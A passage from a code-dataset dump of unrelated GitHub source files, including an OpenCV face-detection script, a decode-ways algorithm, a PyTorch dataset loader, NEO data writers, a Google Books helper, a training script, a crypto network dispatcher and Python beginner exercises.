divide number.', type=int, default=0)\r\n args = parser.parse_args()\r\n face_cascade_name = args.face_cascade\r\n eyes_cascade_name = args.eyes_cascade\r\n \r\n face_cascade = cv.CascadeClassifier()\r\n eyes_cascade = cv.CascadeClassifier()\r\n \r\n def __init__(self):\r\n \r\n if not face_cascade.load(cv.samples.findFile(face_cascade_name)):\r\n print('--(!)Error loading face cascade')\r\n exit(0)\r\n if not eyes_cascade.load(cv.samples.findFile(eyes_cascade_name)):\r\n print('--(!)Error loading eyes cascade')\r\n exit(0)\r\n \r\n if not cap.isOpened:\r\n print('--(!)Error opening video capture')\r\n exit(0)\r\n \r\n self.camera_device = args.camera\r\n self.capture = cv.VideoCapture(self.camera_device)\r\n \r\n while True:\r\n self.ret, self.frame = self.capture.read()\r\n if frame is None:\r\n print('--(!) No captured frame -- Break!')\r\n break\r\n detectAndDisplay(frame)\r\n if cv.waitKey(10) == 27:\r\n break\r\n\r\n def detectAndDisplay(frame):\r\n frame_gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n frame_gray = cv.equalizeHist(frame_gray)\r\n #-- Face\r\n faces = face_cascade.detectMultiScale(frame_gray)\r\n for (x,y,w,h) in faces:\r\n \"\"\"\r\n x = x_faceArea_point_width\r\n y = y_faceArea_point_height\r\n w = lenght_weight\r\n h = lenght_height\r\n \"\"\"\r\n center = (x + w//2, y + h//2)\r\n frame = cv.ellipse(frame, center, (w//2, h//2), 0, 0, 360, (255, 0, 255), 4)\r\n faceROI = frame_gray[y:y+h,x:x+w]\r\n #--Eyes \r\n eyes = eyes_cascade.detectMultiScale(faceROI)\r\n for (x2,y2,w2,h2) in eyes:\r\n \"\"\"\r\n x2 = x_eyeArea_point_width\r\n y2 = y_faceArea_point_height\r\n w2 = lenght_weight_of_eyeArea\r\n h2 = lenght_height_of_eyearea\r\n \"\"\"\r\n eye_center = (x + x2 + w2//2, y + y2 + h2//2)\r\n radius = int(round((w2 + h2)*0.25))\r\n frame = cv.circle(frame, eye_center, radius, (255, 0, 0 ), 4)\r\n cv.imshow('Yuz Tanımlama', frame)\r\n\r\nf=FaceRecognition()\r\nf\r\n\"\"\"\r\n#test\r\ndef detectAndDisplay(frame):\r\n font = cv.FONT_HERSHEY_SIMPLEX\r\n frame=cv.flip(frame,1)\r\n frame = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n frame = cv.equalizeHist(frame)\r\n #-- Detect faces\r\n faces = face_cascade.detectMultiScale(frame)\r\n #print(faces)\r\n for (x,y,w,h) in faces:\r\n center = (x + w//2, y + h//2)\r\n #frame = cv.ellipse(frame, center, (w//2, h//2), 0, 0, 360, (20, 250, 20), 4)\r\n cv.rectangle(frame, (x, y), (x+w, y+h), (0, 0, 255), 2)\r\n faceROI = frame_gray[y:y+h,x:x+w]\r\n cv.line(frame,(x + w//2, y + h//2+20),(x + w//2,y+h),(0,200,200),2)\r\n cv.putText(frame,'Yuz',(x, y-10), font, 1,(60,25,5),1,cv.LINE_AA)\r\n #-- In each face, detect eyes\r\n eyes = eyes_cascade.detectMultiScale(faceROI)\r\n #print(eyes)\r\n if not numpy.any(eyes):\r\n cv.putText(frame,'Goz Tespit Edilmedi',(x, y + h), font, 1,(25,25,250),1)\r\n for (x2,y2,w2,h2) in eyes:\r\n eye_center = (x + x2 + w2//2, y + y2 + h2//2)\r\n radius = int(round((w2 + h2)*0.2))\r\n frame = cv.circle(frame, eye_center, radius, (255, 0, 0 ), 2)\r\n cv.putText(frame,'Gozler',(x + x2 + w2//2, y + y2 + h2//2-10), font, 1,(25,25,25),1)\r\n cv.line(frame,(x + w//2, y + h//2+20),eye_center,(0,200,200),2)\r\n cv.line(frame,(x + w//2, y + y2 + h2//2),eye_center,(200,200,0),2)\r\n cv.imshow('Capture - Face detection', frame)\r\n \r\n\r\nface_cascade = cv.CascadeClassifier(\"haarcascades/haarcascade_frontalface_alt.xml\")\r\neyes_cascade = cv.CascadeClassifier(\"haarcascades/haarcascade_eye.xml\")\r\ncap = cv.VideoCapture(0)\r\nif not cap.isOpened:\r\n print('--(!)Hata Kamera açılmadı')\r\n exit(0)\r\nwhile True:\r\n ret, frame = cap.read()\r\n if frame is None:\r\n print('--(!) Görüntü algılanamadı')\r\n break\r\n detectAndDisplay(frame)\r\n if cv.waitKey(10) == 27 or cv.waitKey(10) == 0xFF:\r\n break \r\n\r\ncap.release()\r\ncv.destroyAllWindows()\r\n\r\nwhile True:\r\n #Capture frame-by-frame\r\n ret, frame = video_capture.read()\r\n frame=cv2.flip(frame,1)\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n faces = faceCascade.detectMultiScale(\r\n gray,\r\n scaleFactor=1.5,\r\n minNeighbors=5,\r\n minSize=(30, 30),\r\n flags=cv2.CASCADE_SCALE_IMAGE\r\n )\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\r\n cv2.imshow('FaceDetection', frame)\r\n #ESC Pressed\r\n key = cv2.waitKey(10) \r\n if key == 27: \r\nı break\r\nvideo_capture.release()\r\ncv2.destroyAllWindows()\r\n\"\"\"\r\n","repo_name":"sezerblt/CameraAlgorithmRepo","sub_path":"face_recog_v1.py","file_name":"face_recog_v1.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35512125049","text":"# total ways to decode a string\n# given that string will not begin with 0 or any invalid character\n# ex , 123 =a,ab,abc,aw\n\ndef ways(string):\n dp = [0 for i in range(len(string))]\n dp[0]=1\n for i in range(1,len(dp)):\n if string[i-1]=='0' and string[i]=='0': #last_two='00'\n # that means no move can be made , so just put 0\n dp[i]=0\n elif string[i-1]=='0' and string[i]!='0': #last_two='0NonZero'\n # this means that we can use only i and not i-1 and i together , in this case put the i-1 value\n dp[i]=dp[i-1]\n elif string[i-1]!='0' and string[i]=='0': #last_two='NonZero0'\n # this means that we can use only i-1 and i together , not i alone\n # in this case we first check if the string forming is less than or equal to 26\n if string[i-1]=='1' or string[i-1]=='2':\n # if the length of string is not lesss than 2\n if i>=2:\n # then we have to take the value prior to nonzero , ie i-2 , 2310-> 23-10\n dp[i]=dp[i-2]\n else:\n # if the length of string is less than 2 then , we just put 1\n dp[i]=1\n else:\n # if the string is bigger than 26 then now way is there , so 0\n dp[i]=0\n else:\n # last_two='NonZeroNonZero\n # in this case we first check if the string forming is less than or equal to 26\n if string[i-1]=='1' or string[i-1]=='2':\n if i>=2:\n # if the length of string is not lesss than 2\n # in case the string is less or equal to 26 and length of string is >=2\n # then we take the sum of 2 values prior to 1\n dp[i]=dp[i-1]+dp[i-2]\n else:\n # if the length of string is less than 2 then , we just take i-1 and add 1 to it\n dp[i]=dp[i-1]+1\n else:\n # if the last_two is greater than 26 , then jsut put the i-1\n dp[i]=dp[i-1]\n # return the last value \n return dp[-1]\n\n\nstring = '231011'\nprint(ways(string))\n","repo_name":"AbhinavSingh111/HackerRank-DS","sub_path":"decode_ways.py","file_name":"decode_ways.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28508755775","text":"import os\nimport torch\nfrom torch.utils.data import IterableDataset\nfrom itertools import cycle\nfrom collections import defaultdict\n\"\"\"\nCustom iterable dataset for streaming in data and data processing utils.\n\"\"\"\n\ndef list_files(directory, ignore_str=\"json\"):\n # ignore_str set to json to skip nbest files\n files = [os.path.join(directory, file) for file in os.listdir(directory) if ignore_str not in file\\\n and os.path.isfile(os.path.join(directory,file))]\n return files\n\ndef return_split(file_name):\n split = file_name.split('/')[-1]\n return split\n\ndef get_next_utterance(directory, sort_by_function=return_split):\n ''' A generator that yields the next utterance '''\n data_files = list_files(directory)\n data_files.sort(key=sort_by_function, reverse=True)\n\n for idx, file_path in enumerate(data_files):\n with open(file_path, \"r\") as transcription_fp:\n for line in transcription_fp:\n yield line\n\ndef custom_collate(batch):\n \"\"\"Collate function to deal with variable length input \"\"\"\n batch_size = len(batch)\n max_len = max([sample[\"text_len\"] for sample in batch])\n\n # IMPORTANT: Enforce padding token to be 0\n padded_input = torch.zeros((batch_size, max_len))\n padded_output = torch.zeros((batch_size, max_len))\n text_len = []\n\n md, md_len = defaultdict(list), defaultdict(list)\n\n for idx, sample in enumerate(batch):\n curr_len = sample[\"text_len\"]\n text_len.append(curr_len)\n padded_input[idx, :curr_len] = sample[\"input\"]\n padded_output[idx, :curr_len] = sample[\"output\"]\n\n sample_md = sample[\"md\"]\n sample_md_len = sample[\"md_len\"]\n if sample_md is None:\n md = None\n md_len = None\n continue\n\n for curr_md_transform, curr_md in sample_md.items():\n md[curr_md_transform].append(curr_md)\n\n for curr_md_transform, curr_md_len in sample_md_len.items():\n md_len[curr_md_transform].append(curr_md_len)\n\n\n text_len = torch.stack(text_len)\n\n if md:\n for curr_md_transform in md.keys():\n md[curr_md_transform] = torch.stack(md[curr_md_transform])\n for curr_md_transform in md.keys():\n md_len[curr_md_transform] = torch.stack(md_len[curr_md_transform])\n\n processed_batch = {\"input\": padded_input,\n \"output\": padded_output,\n \"md\": md,\n \"text_len\": text_len,\n \"md_len\": md_len}\n\n return processed_batch\n\n\nclass MetaDataset(IterableDataset):\n \"\"\"Dataset that can include meta data information. \"\"\"\n\n def __init__(self, data_directory, tokenizer, md_transformer):\n self.data_directory = data_directory\n self.tokenizer = tokenizer\n self.md_transformer = md_transformer\n self.cycle_data = \"train\" in data_directory\n\n def generate_processed_stream(self):\n for utterance in get_next_utterance(self.data_directory):\n md_dict, text = self.md_transformer.parse_raw_input(utterance)\n input = torch.tensor(self.tokenizer.encode_text(text, add_sos=True))\n output = torch.tensor(self.tokenizer.encode_text(text, add_eos=True))\n text_len = torch.tensor(len(input))\n\n if md_dict:\n md = {}\n md_len = {}\n for curr_md_transform, curr_md in md_dict.items():\n if not isinstance(curr_md, torch.Tensor):\n curr_md = torch.tensor(self.tokenizer.encode_text(curr_md))\n curr_md_len = torch.tensor(len(curr_md))\n else:\n curr_md_len = torch.tensor(1)\n\n md[curr_md_transform] = curr_md\n md_len[curr_md_transform] = curr_md_len\n\n else:\n md = None\n md_len = None\n\n sample = {\"input\": input,\n \"output\": output,\n \"md\": md,\n \"text_len\": text_len,\n \"md_len\": md_len}\n yield sample\n\n def __iter__(self):\n if self.cycle_data:\n return cycle(self.generate_processed_stream())\n else:\n return self.generate_processed_stream()\n","repo_name":"amazon-science/contextual-attention-nlm","sub_path":"src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"17839250070","text":"\"\"\"Write a stream of close approaches to CSV or to JSON.\r\n\r\nThis module exports two functions: `write_to_csv` and `write_to_json`, each of\r\nwhich accept an `results` stream of close approaches and a path to which to\r\nwrite the data.\r\n\r\nThese functions are invoked by the main module with the output of the `limit`\r\nfunction and the filename supplied by the user at the command line. The file's\r\nextension determines which of these functions is used.\r\n\r\nYou'll edit this file in Part 4.\r\n\"\"\"\r\nimport csv\r\nimport json\r\n\r\n\r\ndef write_to_csv(results, filename):\r\n \"\"\"Write an iterable of `CloseApproach` objects to a CSV file.\r\n\r\n The precise output specification is in `README.md`. Roughly, each output row\r\n corresponds to the information in a single close approach from the `results`\r\n stream and its associated near-Earth object.\r\n\r\n :param results: An iterable of `CloseApproach` objects.\r\n :param filename: A Path-like object pointing to where the data should be saved.\r\n \"\"\"\r\n fieldnames = (\r\n 'datetime_utc', 'distance_au', 'velocity_km_s',\r\n 'designation', 'name', 'diameter_km', 'potentially_hazardous'\r\n )\r\n # Done: Write the results to a CSV file, following the specification in the instructions.\r\n with open(filename, \"w\", newline=\"\") as output_file:\r\n writer = csv.DictWriter(output_file, fieldnames=fieldnames)\r\n writer.writeheader()\r\n for row in results:\r\n #info = row.serialize() | row.neo.serialize() works on python 3.9\r\n d1,d2 = row.serialize(),row.neo.serialize()\r\n info = {**d1,**d2}\r\n info[\"name\"] = info[\"name\"] if info[\"name\"] is not None else \"\"\r\n info[\"potentially_hazardous\"] = (\r\n \"True\" if info[\"potentially_hazardous\"] else \"False\"\r\n )\r\n writer.writerow(info)\r\n\r\n\r\ndef write_to_json(results, filename):\r\n \"\"\"Write an iterable of `CloseApproach` objects to a JSON file.\r\n\r\n The precise output specification is in `README.md`. Roughly, the output is a\r\n list containing dictionaries, each mapping `CloseApproach` attributes to\r\n their values and the 'neo' key mapping to a dictionary of the associated\r\n NEO's attributes.\r\n\r\n :param results: An iterable of `CloseApproach` objects.\r\n :param filename: A Path-like object pointing to where the data should be saved.\r\n \"\"\"\r\n # done: Write the results to a JSON file, following the specification in the instructions.\r\n output_data = []\r\n for row in results:\r\n d1,d2 = row.serialize(),row.neo.serialize()\r\n #info = row.serialize() | row.neo.serialize() # Use python 3.9 or higher\r\n info = {**d1,**d2}\r\n info[\"name\"] = info[\"name\"] if info[\"name\"] is not None else \"\"\r\n info[\"potentially_hazardous\"] = (\r\n bool(1) if info[\"potentially_hazardous\"] else bool(0)\r\n )\r\n output_data.append(\r\n {\r\n \"datetime_utc\": info[\"datetime_utc\"],\r\n \"distance_au\": info[\"distance_au\"],\r\n \"velocity_km_s\": info[\"velocity_km_s\"],\r\n \"neo\": {\r\n \"designation\": info[\"designation\"],\r\n \"name\": info[\"name\"],\r\n \"diameter_km\": info[\"diameter_km\"],\r\n \"potentially_hazardous\": info[\"potentially_hazardous\"],\r\n },\r\n }\r\n )\r\n\r\n with open(filename, \"w\") as file:\r\n json.dump(output_data, file, indent=\"\\t\")\r\n","repo_name":"manojkumar1053/ADV-Python-01","sub_path":"write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25754908667","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 11 09:32:31 2022\n\n@author: books\n\"\"\"\n\nimport requests\nimport json\n\ndef search_google_books(author=None, isbn=None, title=None, num_results=1, language=\"en\", verbose=False):\n \"\"\"\n Searches for book information from the Google Books API. \\\n Information is first retreived in JSON format, and \\\n then parsed to a list of dictionaries.\n \n :param author: Part of author name (first and/or last)\n :type author: str\n :param isbn: ISBN10 or ISBN13\n :type isbn: str or int\n :param title: Part of the book title\n :type title: str\n :param num_results: Number of results to be returned\n :type num_results: int\n :param language: String of the 2-character laguage code\\\n for the desired language\n :type language: str\n \n \"\"\"\n query_url=\"https://www.googleapis.com/books/v1/volumes?q=\"\n if author!=None and author!='':\n query_url=query_url+\"inauthor:\"+author+\"+\"\n if isbn!=None and isbn!='':\n query_url=query_url+\"isbn:\"+isbn +\"+\"\n if title!=None and title!='':\n query_url=query_url+\"intitle:\"+title\n query_url=query_url.strip(\"+\")\n query_url=query_url+\"&langRestrict=\"+language\n \n #query_url=query_url.strip(\"&\")\n \n if verbose==True:\n print(query_url)\n r=requests.get(query_url)\n return json.loads(r.text)['items'][0:num_results]\n\ndef parse_google_record(record):\n \"\"\"\n Removes unnecessary key/values from record and returns a \\\n dictionary with only necessary key/values.\n \n :param record: dictionary representing a book\n :type record: dict\n :returns: dictionary with only necessary key/values\n :rtype: dict\n \"\"\"\n try:\n volume_info=record['volumeInfo']\n title=volume_info['title']\n authors=volume_info['authors'][0]\n publisher=volume_info['publisher']\n publish_date=volume_info['publishedDate']\n description=volume_info['description']\n identifiers=volume_info['industryIdentifiers']\n isbn10=None\n isbn13=None\n for item_dict in identifiers:\n if len(item_dict['identifier'])==10:\n isbn10=item_dict['identifier']\n elif len(item_dict['identifier'])==13:\n isbn13=item_dict['identifier']\n page_count=volume_info['pageCount']\n parsed_dict={'title':title, 'authors':authors,\\\n 'publisher':publisher, 'publish_date':publish_date,\\\n 'description':description, 'isbn10':isbn10,\\\n 'isbn13':isbn13, 'page_count':page_count}\n return parsed_dict\n except:\n print('Error occured.')","repo_name":"cbrewer97/books-catalog","sub_path":"src/google_tools.py","file_name":"google_tools.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23232713624","text":"score = 0\nmax_score = 0\nbest_player = \"\"\nmax_score = 0\n\nwhile True:\n name = input()\n if name == \"Stop\":\n break\n score = 0\n for i in range(len(name)):\n number = int(input())\n if number == ord(name[i]):\n score += 10\n else:\n score +=2\n\n if score >= max_score:\n max_score = score\n best_player = name\n\nprint(F\"The winner is {best_player} with {max_score} points!\")\n\n","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"Online_Exam_6_and_7_July_2019/06_Name_Game.py","file_name":"06_Name_Game.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42436521402","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 5 13:57:15 2022\r\n\r\n@author: wangqinyu\r\n\"\"\"\r\nimport os\r\nimport sys\r\nfrom tabnanny import verbose\r\nimport torch\r\nimport numpy as np\r\nfrom Loss import CtdetLoss\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nfrom torch.optim.lr_scheduler import StepLR\r\n\r\nfrom dataset import ctDataset,ctDataset_DSB\r\nimport pickle\r\n\r\nsys.path.append(r'./backbone')\r\nfrom charnet import CharNet\r\nfrom resnet_fpn import ResNet\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '1' \r\nuse_gpu = torch.cuda.is_available()\r\n\r\nmodel = ResNet(50)\r\nmodel = torch.nn.DataParallel(model)\r\ncuda = True if torch.cuda.is_available() else False\r\nFloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor\r\n\r\nloss_weight={'hm_weight':1,'wh_weight':0.1,'reg_weight':0.1,'mask_weight':0.5}\r\n# loss_weight={'hm_weight':0.,'wh_weight':0.,'reg_weight':0.,'mask_weight':1}\r\ncriterion = CtdetLoss(loss_weight)\r\n\r\ndevice = torch.device(\"cuda\")\r\nif use_gpu:\r\n model.cuda()\r\n\r\n# model.load_state_dict(torch.load('./weights/OWN/resnet101fpn_1108_epoch_3.pth'))\r\n\r\n\r\nmodel.train()\r\n\r\nlearning_rate = 1.25e-4\r\nnum_epochs = 60\r\n\r\n\r\noptimizer = torch.optim.Adam(model.parameters(), \r\n lr=learning_rate, \r\n weight_decay=1.25e-4) \r\nlr_scheduler = StepLR(optimizer,\r\n step_size=20,\r\n gamma=0.5,\r\n verbose=True)\r\n\r\ntrain_dataset = ctDataset_DCCB(split='train')\r\ntrain_loader = DataLoader(train_dataset,batch_size=8,shuffle=False,num_workers=4) # num_workers是加载数据(batch)的线程数目\r\n\r\ntest_dataset = ctDataset_DCCB(split='val')\r\ntest_loader = DataLoader(test_dataset,batch_size=1,shuffle=False,num_workers=4)\r\nprint('the dataset has %d images' % (len(train_dataset)))\r\n\r\n\r\nnum_iter = 0\r\n\r\nbest_test_loss = np.inf \r\n#! write logs\r\nwriter = SummaryWriter('./visualization/DCCB')\r\nfor epoch in range(0,num_epochs):\r\n model.train()\r\n \r\n # total_loss = 0.\r\n for i, sample in enumerate(train_loader):\r\n # print(sample.keys())\r\n for k in sample:\r\n sample[k] = sample[k].to(device=device, non_blocking=True)\r\n # print(sample[k].shape)\r\n pred = model(sample['input'])\r\n \r\n # loss = criterion(pred, sample)\r\n hm_loss, wh_loss, reg_loss, mask_loss = criterion(pred, sample) \r\n loss = hm_loss + wh_loss + reg_loss + mask_loss\r\n \r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n \r\n if (i+1) % 5 == 0:\r\n print ('Epoch [%d/%d], Iter [%d/%d] total_loss: %.4f hm_oss: %.4f wh_loss: %.4f reg_loss: %.4f mask_loss: %.4f' \r\n %(epoch, num_epochs, i+1, len(train_loader), \r\n loss.item(), \r\n hm_loss.item(), \r\n wh_loss.item(), \r\n reg_loss.item(), \r\n mask_loss))\r\n num_iter += 1\r\n \r\n # if (i+1) % 10000 == 0:\r\n # torch.save(model.state_dict(),'./weights/OWN/resnet50fpn_0107_epoch_{}_{}.pth'.format(epoch,i+1),_use_new_zipfile_serialization=False)\r\n # writer.add_scalar(\"train/dsb_shrink06_total\", loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"train/dsb_shrink06_hm\", hm_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"train/dsb_shrink06_wh\", wh_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"train/dsb_shrink06_reg\", reg_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"train/dsb_shrink06_mask\", mask_loss.data, i + (epoch-1) * len(train_loader)) \r\n \r\n \r\n validation_loss = 0.0\r\n model.eval()\r\n for i, sample in enumerate(test_loader):\r\n if use_gpu:\r\n for k in sample:\r\n sample[k] = sample[k].to(device=device, non_blocking=True)\r\n\r\n pred = model(sample['input'])\r\n # loss = criterion(pred, sample)\r\n hm_loss, wh_loss, reg_loss, mask_loss = criterion(pred, sample) \r\n val_loss = hm_loss + wh_loss + reg_loss + mask_loss\r\n\r\n validation_loss += val_loss.item()\r\n \r\n validation_loss /= len(test_loader)\r\n writer.add_scalar(\"test_loss/DSB_test0607_1\", validation_loss, epoch+1)\r\n \r\n # writer.add_scalar(\"test/total\", loss.data, epoch)\r\n # writer.add_scalar(\"test/hm\", hm_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"test/wh\", wh_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"test/reg\", reg_loss.data, i + (epoch-1) * len(train_loader))\r\n # writer.add_scalar(\"test/mask\", mask_loss.data, i + (epoch-1) * len(train_loader))\r\n \r\n \r\n torch.save(model.state_dict(),'./weights/epoch_{}.pth'.format(epoch),_use_new_zipfile_serialization=False)\r\n lr_scheduler.step()\r\n","repo_name":"Wang-Qinyu/CellNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71476754088","text":"from typing import Optional\nfrom app.models.wallets import NetworkType, CryptocurrencyType\n\nfrom .base import CryptocurrencyInterface\nfrom .btc import Bitcoin\nfrom .erc20 import Erc20Network\nfrom .trc20 import TRC20Network\n\n\nclass CryptoService:\n def __init__(\n self,\n bitcoin_network: Bitcoin,\n erc20_network: Erc20Network,\n trc20_network: TRC20Network\n ) -> None:\n self._bitcoin_network = bitcoin_network\n self._erc20_network = erc20_network\n self._trc20_network = trc20_network\n\n def __call__(\n self,\n network: NetworkType,\n cryptocurrency: Optional[CryptocurrencyType] = None\n ) -> CryptocurrencyInterface:\n if network == NetworkType.bitcoin_network:\n return self._bitcoin_network\n elif network == NetworkType.trc20:\n if not cryptocurrency:\n return self._trc20_network(CryptocurrencyType.trx)\n return self._trc20_network(cryptocurrency)\n elif network == NetworkType.erc20:\n if not cryptocurrency:\n return self._erc20_network(CryptocurrencyType.ethereum)\n return self._erc20_network(cryptocurrency)\n\n","repo_name":"EasyDev-co/PaymentCryptoService","sub_path":"app/app/services/crypto/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3930319970","text":"import os.path\nsrcdir = os.environ.get('srcdir','.')\npath = os.path.join(srcdir, 'config', 'lint-rules.am')\n\n# relpath import (available in Python 2.6 and above)\ntry:\n relpath = os.path.relpath\nexcept AttributeError:\n\n from os.path import curdir, sep, pardir, join\n\n def relpath(path, start=curdir):\n \"\"\"Return a relative version of a path\"\"\"\n\n if not path:\n raise ValueError(\"no path specified\")\n\n start_list = os.path.abspath(start).split(sep)\n path_list = os.path.abspath(path).split(sep)\n\n # Work out how much of the filepath is shared by start and path.\n i = len(os.path.commonprefix([start_list, path_list]))\n\n rel_list = [pardir] * (len(start_list)-i) + path_list[i:]\n if not rel_list:\n return curdir\n return join(*rel_list)\n\nclass ChangeProtectedFile(object):\n # from register_plugins.py. XXX: duplication. fix.\n\n def __init__(self, fname):\n self.bogus_file= False\n self.real_fname= fname\n self.new_fname= \"%s.new\" % fname\n try:\n self.new_file= open(self.new_fname,'w+')\n except IOError:\n self.bogus_file= True\n\n def write(self, text):\n if not self.bogus_file:\n self.new_file.write(text)\n\n # We've written all of this out into .new files, now we only copy them\n # over the old ones if they are different, so that we don't cause \n # unnecessary recompiles\n def close(self):\n \"\"\"Return True if the file had changed.\"\"\"\n if self.bogus_file:\n return\n self.new_file.seek(0)\n new_content = self.new_file.read()\n self.new_file.close()\n try:\n old_file = file(self.real_fname, 'r')\n old_content = old_file.read()\n old_file.close()\n except IOError:\n old_content = None\n if new_content != old_content:\n if old_content != None:\n os.unlink(self.real_fname)\n os.rename(self.new_fname, self.real_fname)\n return True\n else:\n try:\n os.unlink(self.new_fname)\n except:\n pass\noutput = ChangeProtectedFile(path)\n\n# We write a makefile that causes:\n# linted to depend on linting all the source files we find\n# linting a source file to depend on the output dep file for that linted file.\n\n\ndef lint_path(path):\n # linted depends on linting this:\n output.write('linted: %s.linted\\n' % path)\n output.write('%s.linted: %s\\n' % (path, path))\n # the thing being linted depends on the dependencies included in\n # the lint output\n #output.write('@am__include@ @am__quote@%s.linted@am__quote@\\n' % path)\n # If the lint file doesn't exist, we'll make one, or else we have to do\n # a full lint run on every fresh bzr checkout, which is sort of silly\n #if not os.path.exists(\"%s.linted\" % path):\n # lint_file = open(\"%s.linted\" % path,\"w\")\n # lint_file.write(\"# Placeholder to make empty file\")\n # lint_file.close()\n\n\ndef clean_lints(paths):\n output.write('cleanlints:\\n')\n # batch in 50\n for pos in range(len(paths)/50 + 1):\n path_str = ' '.join((path + '.linted') for path in paths[pos *50:(pos + 1)*50])\n if not path_str:\n continue\n output.write('\\trm -f %s\\n' % path_str)\n\n\ndef should_lint(path):\n if not (path.endswith('.cc') or path.endswith('.h')):\n return False\n if not (path.startswith('plugin/') or path.startswith('drizzled/') or\n path.startswith('client/')):\n return False\n # Let's not lint emacs autosave files\n if (os.path.split(path)[-1].startswith('.#')):\n return False\n # We need to figure out how to better express this\n for exclude in ['innobase', 'pbxt', 'pbms', 'gnulib', '.pb.', 'bak-header', 'm4',\n 'sql_yacc', 'gperf', 'drizzled/probes.h',\n 'drizzled/function_hash.h', 'drizzled/symbol_hash.h',\n 'util/dummy.cc', 'drizzled/sql_yacc.h', 'drizzled/configmake.h',\n\t'drizzled/plugin/version.h',\n 'drizzled/generated_probes.h',\n 'drizzled/module/load_list.h']:\n if exclude in path:\n return False\n return True\n\ndef accumulate_sources(arg, dirname, fnames):\n for fname in fnames:\n path = os.path.join(dirname, fname)\n path = relpath(path, srcdir)\n if not should_lint(path):\n continue\n arg.append(path)\n\nsources_list = []\nos.path.walk(srcdir,accumulate_sources,sources_list)\nsources_list.sort()\nfor path in sources_list:\n lint_path(path)\nclean_lints(sources_list)\n\noutput.close()\n","repo_name":"posulliv/stad","sub_path":"config/make-lint.py","file_name":"make-lint.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4375445093","text":"# Exercício 1\n# Crie um sistema de cadastro de produtos em uma lista de produtos\n# Seu sistema deve:\n# - Pegar o usuário qual produto vai ser cadastrado por meio de um input\n# - Garantir que se o usuário escrever com letra maiúscula ou minúscula, o produto continua sendo o mesmo produto\n# - Se o usuário inserir um produto que já existe na lista, o programa deve printar a mensagem \"Produto já existente, tente novamente\"\n# - Se o usuário inserir um produto que não existe na lista, o programa deve inserir na lista, printar a mensagem Produto X cadastrado com sucesso e em seguida printar a lista completa\n\nprodutos = [\"celular\", \"camera\", \"fone de ouvido\", \"monitor\"]\n\nprint('***CADASTRO DE PRODUTOS***')\nprint(produtos)\nprint('Caso queira finalizar digite \"fim\"',end='\\n\\n')\n\nwhile True:\n \n novo_produto=input('Digite o nome do produto: ')\n if novo_produto=='fim':\n print('PROGRAMA FINALIZADO!')\n break\n\n elif novo_produto.casefold() not in produtos:\n produtos.append(novo_produto.casefold())\n print('Produto {} cadastrado com sucesso!'.format(novo_produto))\n print(produtos,end='\\n\\n')\n\n else:\n print('Produto já existente, tente novamente!')\n\n\n\n\n# Exercício 2\n# Crie um sistema de consulta de preços\n# Seu sistema deve:\n# - Pedir para o usuário o nome de um produto\n# - Caso o produto exista na lista de produtos, o programa deve retornar o preço do produto como resposta\n# - Ex: O produto celular custa R$1500\n# - Caso o produto não exista na lista de produtos, o programa deve printar uma mensagem para o usuário tentar novamente\nprodutos = [\"celular\", \"camera\", \"fone de ouvido\", \"monitor\"]\nprecos = [1500, 1000, 800, 2000]\n\n\n# Exercício 3\n# Crie um sistema de consulta de bônus dos funcionários\n# Seu sistema deve:\n# - Pegar o valor de vendas do funcinoário por meio de um input\n# - Calcular o bônus do funcionário de acordo com a seguinte regra:\n# - Se o funcionário vendeu mais de 1000 unidades, ele ganha R$2 de bonus para cada unidade vendida\n# - Se o funcionário vendeu mais de 5000 unidades, ele ganha R$2 de bônus para cada unidade + um valor fixo de R$1000\n# - Se o funcionário vendeu menos de 1000 unidades, ele não ganha bônus\n# - Printar no final o valor do bônus do funcionário\n\n\n# Exercício 4\n# Crie um programa que consiga descobrir qual dos vendedores vendeu mais\n# As vendas dos vendedores são listas com a quantidade vendida por cada vendedor\n\nvendas = [\n [10, 20, 100, 80, 90, 100, 20, 30, 44, 55, 33, 34, 100, 90, 80, 